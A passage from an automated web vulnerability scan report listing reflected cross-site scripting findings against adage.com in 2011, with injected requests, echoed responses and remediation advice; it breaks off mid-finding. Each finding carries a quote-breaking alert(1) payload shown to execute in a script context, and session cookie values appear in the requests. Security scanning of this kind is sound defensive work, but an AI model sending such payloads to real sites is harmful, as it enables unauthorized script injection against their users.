The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96793"-alert(1)-"a394d944e1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons96793"-alert(1)-"a394d944e1f/xing.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=88C3436AA4114F78F4C5848CCBBD40D55CF5B948; path=/
Set-Cookie: HMAC=4579CE5B53DD0BC26FEFF0A700A2B8993D76EBCC; path=/
Set-Cookie: HMAC=7DB04CBF69DC08A8A934F23D68C5FC92B6EFFECC; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49473
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons96793"-alert(1)-"a394d944e1f/xing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="
...[SNIP]...

1.60. http://adage.com//images/save-and-share-icons/xing.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/xing.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fd01"-alert(1)-"cbc44a735e8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/xing.png8fd01"-alert(1)-"cbc44a735e8?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=B6D4AD9A93DD035B602CC2AAD35721A5D135A0AC; path=/
Set-Cookie: HMAC=C7FA34232180485A1A3536DC983C318C11E7BB5F; path=/
Set-Cookie: HMAC=6D494A9DD9C0B1D9A903518AE0B52F0D5BB33674; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49473
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/xing.png8fd01"-alert(1)-"cbc44a735e8"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.61. http://adage.com/ajax/get_comments.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /ajax/get_comments.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7b7"-alert(1)-"366d2d0d6da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajax7b7b7"-alert(1)-"366d2d0d6da/get_comments.php?article_id=229525 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F; __utma=1.1885314013.1314893339.1314893339.1314893339.1; __utmb=1.1.10.1314893339; __utmc=1; __utmz=1.1314893339.1.1.utmcsr=doubleverify.com|utmccn=(referral)|utmcmd=referral|utmcct=/resources/; OAX=Mhd7ak5frfsAAc+6; __qca=P0-1500348259-1314893346693; CP=null*

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:13:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=BB107E0DFD6B2FCAAFF77CA2A6ABC129175B5314; path=/
Set-Cookie: HMAC=A0BB7E95CF689FDEBDA1AE88A0581BAA70C4945B; path=/
Set-Cookie: HMAC=2B11B5F0414833ADBAA5580B5C5A9B65E6AC1839; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49464
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
BX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?article_id=229525";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/ajax7b7b7"-alert(1)-"366d2d0d6da/get_comments.php"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
h
...[SNIP]...

1.62. http://adage.com/ajax/get_comments.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /ajax/get_comments.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3cb7"-alert(1)-"a81db8a7c00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajax/get_comments.phpc3cb7"-alert(1)-"a81db8a7c00?article_id=229525 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F; __utma=1.1885314013.1314893339.1314893339.1314893339.1; __utmb=1.1.10.1314893339; __utmc=1; __utmz=1.1314893339.1.1.utmcsr=doubleverify.com|utmccn=(referral)|utmcmd=referral|utmcct=/resources/; OAX=Mhd7ak5frfsAAc+6; __qca=P0-1500348259-1314893346693; CP=null*

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:13:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=304BD4F634CE9AF2384D98A1138DBF81800DFC6B; path=/
Set-Cookie: HMAC=94EA98DD4E26275F970A1FE4B54F876C11313528; path=/
Set-Cookie: HMAC=CC55A4626E8FC88BE0ED3B950F8912B5E91416A9; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49464
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?article_id=229525";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/ajax/get_comments.phpc3cb7"-alert(1)-"a81db8a7c00"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.63. http://adage.com/ajax/get_comments.php [article_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /ajax/get_comments.php

Issue detail

The value of the article_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a47d"-alert(1)-"9cc0d874d9c was submitted in the article_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajax/get_comments.php?article_id=2295253a47d"-alert(1)-"9cc0d874d9c HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F; __utma=1.1885314013.1314893339.1314893339.1314893339.1; __utmb=1.1.10.1314893339; __utmc=1; __utmz=1.1314893339.1.1.utmcsr=doubleverify.com|utmccn=(referral)|utmcmd=referral|utmcct=/resources/; OAX=Mhd7ak5frfsAAc+6; __qca=P0-1500348259-1314893346693; CP=null*

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:13:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=7E7E9530B5C27ED13881E2AA999737911B93655D; path=/
Set-Cookie: HMAC=7227FF5351EA8EBAC804BEF24DD5263F89826A90; path=/
Status: 404 Not Found
Set-Cookie: HMAC=DB40930A67A6143B254ADA97A1CEFB425F014C46; path=/
Set-Cookie: HMAC=CE1E489F0E677A97D8AC837AA4DEC2ACDAB55CE4; path=/
Set-Cookie: HMAC=75007C044C1285A992DF7FF2088B18B0ED2A2D0A; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49520
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
_N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "get_comments.php?article_id=2295253a47d"-alert(1)-"9cc0d874d9c";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/ajax/get_comments.php"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
/
...[SNIP]...

1.64. http://adage.com/ajax/get_comments.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /ajax/get_comments.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef573"-alert(1)-"863d9e39407 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajax/get_comments.php?article_id=22/ef573"-alert(1)-"863d9e394079525 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F; __utma=1.1885314013.1314893339.1314893339.1314893339.1; __utmb=1.1.10.1314893339; __utmc=1; __utmz=1.1314893339.1.1.utmcsr=doubleverify.com|utmccn=(referral)|utmcmd=referral|utmcct=/resources/; OAX=Mhd7ak5frfsAAc+6; __qca=P0-1500348259-1314893346693; CP=null*

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:13:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=58F2E1760667878ECD581F800051DC1F4DB2D418; path=/
Set-Cookie: HMAC=D6610672B12C2B84C8B40A39DF04E56D5D57E92A; path=/
Status: 404 Not Found
Set-Cookie: HMAC=C7B416C3F6F8061C9C2AD4D539050C3783559DF6; path=/
Set-Cookie: HMAC=0B8A78F1E6E9CAB03F7B5ADEF802CE221568DD02; path=/
Set-Cookie: HMAC=C07B300DD4654C0CFA1B9E4888506E39C4A45316; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49522
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "get_comments.php?article_id=22/ef573"-alert(1)-"863d9e394079525";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/ajax/get_comments.php"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABL
...[SNIP]...

1.65. http://adage.com/article/digital/doubleverify-33m-funding/229525/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /article/digital/doubleverify-33m-funding/229525/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8361"-alert(1)-"1042b2e5d11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articled8361"-alert(1)-"1042b2e5d11/digital/doubleverify-33m-funding/229525/ HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://www.doubleverify.com/resources/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=246A895C47849821EC02CF4535AABA5189357C05; path=/
Set-Cookie: HMAC=70CAE80D425C4AB11DA485022461B5A95CB52E29; path=/
Set-Cookie: HMAC=1960647E49A528B8AA188F278C52BF9468ABCE38; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49473
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pv");hbx.vpc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/articled8361"-alert(1)-"1042b2e5d11/digital/doubleverify-33m-funding/229525/"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none"
...[SNIP]...

1.66. http://adage.com/article/digital/doubleverify-33m-funding/229525/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /article/digital/doubleverify-33m-funding/229525/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddfeb"-alert(1)-"304ed33505d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article/digital/doubleverify-33m-funding/229525ddfeb"-alert(1)-"304ed33505d/ HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://www.doubleverify.com/resources/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=A2F56F5F2831ACC16480AF1DBA36267B959EBC63; path=/
Set-Cookie: HMAC=7049C40ECF1B42AD1607002EE31C89516C96EB06; path=/
Status: 404 Not Found
Set-Cookie: HMAC=0CC124562C7BF49FF68C85C0A55413726518CCCF; path=/
Set-Cookie: HMAC=BE7B4E1DDAE1C079CC834A08774B6EA6E3C276CF; path=/
Set-Cookie: HMAC=BF27D1FC3AD3A30EA50B13861CC6238F1F3B9520; path=/
Set-Cookie: redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525ddfeb%22-alert%281%29-%22304ed33505d%2F; expires=Fri, 31-Aug-2012 16:12:08 GMT; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 49477

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
tbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "article.php";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/article/digital/doubleverify-33m-funding/229525ddfeb"-alert(1)-"304ed33505d/"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.
...[SNIP]...

1.67. http://adage.com/article/digital/doubleverify-33m-funding/229525/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /article/digital/doubleverify-33m-funding/229525/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d08c6"-alert(1)-"fa56ecc0080 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article/digital/doubleverify-33m-funding/229525/?d08c6"-alert(1)-"fa56ecc0080=1 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://www.doubleverify.com/resources/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 01 Sep 2011 16:10:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=F7373A1FA8FD49A53BBEE4862DC1D5814C38BA36; path=/
Set-Cookie: HMAC=4F37D02818900DD604F64F89B6EFCCA1F19EA15E; path=/
Set-Cookie: redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F%3Fd08c6%22-alert%281%29-%22fa56ecc0080%3D1; expires=Fri, 31-Aug-2012 16:10:21 GMT; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 75706

<!DOCTYPE html>

<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">

<head profile="http://a9.com/-/spec/opensearch/1.1/">

<title>DoubleVerify Gets Another $33M in Funding | Digital - A
...[SNIP]...
bEC++]=new Object();b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "article.php?d08c6"-alert(1)-"fa56ecc0080=1";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/article/digital/doubleverify-33m-funding/229525/"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

...[SNIP]...

1.68. http://adage.com/css/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /css/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90f52"-alert(1)-"5ae0a33a27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css90f52"-alert(1)-"5ae0a33a27/style.css?1314816038 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=45FDC1F0C5FED5415AA506393E1402B6C52109AD; path=/
Set-Cookie: HMAC=2FE609C1B55537F5E34F11ECACDDB2CD47880965; path=/
Set-Cookie: HMAC=81ABE1FE6ECB7FF525ED70E4DC59E343DF8B95D2; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49448
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
x.vpc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1314816038";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/css90f52"-alert(1)-"5ae0a33a27/style.css"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft=
...[SNIP]...

1.69. http://adage.com/css/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /css/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1369"-alert(1)-"9ba2570b3e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

